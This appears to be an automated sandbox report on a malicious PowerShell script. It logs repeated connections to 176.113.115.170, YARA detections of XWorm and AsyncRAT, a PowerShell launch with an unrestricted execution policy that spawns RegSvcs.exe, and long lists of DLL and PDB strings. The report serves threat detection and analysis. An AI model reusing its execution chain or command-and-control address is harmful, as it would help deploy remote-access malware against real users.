            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: powershell.exe, 00000000.00000002.1361364825.0000024AA0D94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1341599146.0000024A91DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000000.00000002.1341599146.0000024A90D37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000000.00000002.1341599146.0000024A90B11000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.3662994755.00000000031F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Amcache.hve.18.drString found in binary or memory: http://upx.sf.net
            Source: powershell.exe, 00000000.00000002.1341599146.0000024A90D37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000000.00000002.1341599146.0000024A90B11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000000.00000002.1341599146.0000024A91DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000000.00000002.1341599146.0000024A91DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000000.00000002.1341599146.0000024A91DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000000.00000002.1341599146.0000024A90D37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000000.00000002.1341599146.0000024A90F6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000000.00000002.1361364825.0000024AA0D94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1341599146.0000024A91DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 0.2.powershell.exe.24a90f10d10.3.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.24a90f10d10.3.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.powershell.exe.24a91d29520.4.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.24a91d29520.4.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0000000A.00000002.3659100760.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.1341599146.0000024A90D37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.1341599146.0000024A90F6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAACA3554A0_2_00007FFAACA3554A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAACA3211D0_2_00007FFAACA3211D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAACA3A9D90_2_00007FFAACA3A9D9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAACA35FA00_2_00007FFAACA35FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0304634010_2_03046340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0304C2D810_2_0304C2D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0304B59810_2_0304B598
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_030484B810_2_030484B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_03045A7010_2_03045A70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_03042C8810_2_03042C88
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0304572810_2_03045728
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_03040FA010_2_03040FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7336 -s 1420
            Source: 0.2.powershell.exe.24a90f10d10.3.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.24a90f10d10.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.24a91d29520.4.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.24a91d29520.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0000000A.00000002.3659100760.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.1341599146.0000024A90D37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.1341599146.0000024A90F6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, g3vLTCbXUu.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, gu9bOeQlhx.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, gu9bOeQlhx.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, g3vLTCbXUu.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, gu9bOeQlhx.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, gu9bOeQlhx.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, wMziNr7YQaG4tCngR7hQC89Pal5rBGWte679.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, wMziNr7YQaG4tCngR7hQC89Pal5rBGWte679.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, wMziNr7YQaG4tCngR7hQC89Pal5rBGWte679.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, wMziNr7YQaG4tCngR7hQC89Pal5rBGWte679.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.evad.winPS1@7/10@0/1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\ukwmDtxIT3xNIMhL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7336
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tanhfh4q.da5.ps1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: 176.113.115_1.170.ps1Virustotal: Detection: 18%
            Source: 176.113.115_1.170.ps1ReversingLabs: Detection: 13%
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115_1.170.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7336 -s 1420
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdnsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbW source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 0000000A.00000002.3682055554.0000000005A2B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdbi source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.Management.pdbx source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: @[o.pdbsw source: RegSvcs.exe, 0000000A.00000002.3682055554.0000000005A2B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb4 source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.PDBsg] source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb89O source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1341539656.0000024A90AB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.1341599146.0000024A90D37000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: mscorlib.ni.pdbRSDS source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: Microsoft.VisualBasic.pdbH source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.Configuration.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.Xml.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.Core.ni.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.Xml.pdbO source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.Windows.Forms.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: mscorlib.pdb source: RegSvcs.exe, 0000000A.00000002.3683262361.0000000006B28000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp, WERACBB.tmp.dmp.18.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32x source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Drawing.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.Management.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: mscorlib.ni.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: \??\C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 0000000A.00000002.3659546124.000000000153C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdb-SJ source: RegSvcs.exe, 0000000A.00000002.3659546124.000000000153C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdbX source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: symbols\dll\mscorlib.pdbLb source: RegSvcs.exe, 0000000A.00000002.3682055554.0000000005A2B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: HPOo0C:\Windows\mscorlib.pdb source: RegSvcs.exe, 0000000A.00000002.3682055554.0000000005A2B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\exe\RegSvcs.pdb source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ?[oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbD source: RegSvcs.exe, 0000000A.00000002.3682055554.0000000005A2B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb s source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.ni.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WERACBB.tmp.dmp.18.dr

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
